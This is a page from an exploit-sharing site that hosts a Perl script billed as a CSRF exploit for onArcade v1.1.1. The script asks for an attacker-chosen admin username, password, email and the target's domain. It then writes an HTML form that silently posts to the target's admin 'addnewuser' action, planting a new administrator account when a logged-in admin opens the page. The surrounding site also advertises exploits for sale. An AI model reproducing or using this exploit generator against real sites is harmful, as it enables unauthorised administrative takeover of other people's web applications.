0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability
Autor
Ryzyko
![](/img/risk/critlow_0.gif)
Nieskategoryzowane Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
#!usr/bin/perl ################################################### # Title : onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability # Software : onArcade Game # Version : 1.1.1 # Date : n/a # Author : Or4nG.M4n # visit : or4ng3m4n.blogspot.com ################################################## # Start Code print q( +----------------------------------------+ | CSRF CREATE YOUR Exploit By 0r4Ng.M4n | | visit : Or4ng3M4n.BlogSpot.com | +----------------------------------------+ ); # add Page name For safe Exploit print "save as :"; $safe=<STDIN>; # add admin name print "admin name :"; $ad=<STDIN>; # add admin pass print "admin pass :"; $ps=<STDIN>; # add admin email print "admin Email :"; $em=<STDIN>; # add host domain print "domain :"; $ho=<STDIN>; # add path script : if you don't add path just Entr print "path :"; $ph=<STDIN>; open(CREATE,">>$safe"); print CREATE " <HTML><HEAD><TITLE>Exploit .. By Or4nG.M4n</TITLE> <form action='http://$ho/$ph/admin/index.php?action=addnewuser' method='POST' name='form'> <input type='hidden' value='$ad' name='eusername' ></td> <input type='hidden' value='$ps' name='euserpassword' ></td> <input type='hidden' value='$em' name='euseremail' > <select name='eusergroup'><option value='2'></option></select></td> <select name='euserstatus'><option value='1'></option></select></td> <input type='submit' name='submit' value='add' ></td>"; close(CREATE); print "d0n3\n"; print q( +---------------------------------------------------+ | # -------------[GreEtz & Thnks]------------- # | | Greetz : Fox , Lagripe-dz , SarBoT511 , SadHaCkEr | | i-Hmx , xss mAn , Cyb3r-sA , Dr.TaiGar , h3llc0d3 | | BiG Thnks : sa^dev!L , Lagripe-dz | +---------------------------------------------------+ | or4ng3m4n.blogspot.com | sec4ever | v4-team | 7rs | ); # End Code # 0day.today [2024-07-02] #